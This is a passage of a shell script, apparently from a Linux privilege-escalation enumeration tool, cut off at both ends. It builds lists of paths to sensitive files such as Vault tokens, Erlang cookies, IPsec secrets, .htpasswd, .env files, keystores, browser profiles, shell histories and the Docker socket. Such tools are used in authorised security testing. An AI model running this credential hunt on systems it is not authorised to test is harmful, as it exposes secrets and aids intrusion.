"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "filelliza$|filezilla\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '/lib' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E 'README.gnupg' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^$GREPHOMESEARCH" | grep -E "\.mozilla$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^$GREPHOMESEARCH" | grep -E "google-chrome$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\..*_history$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 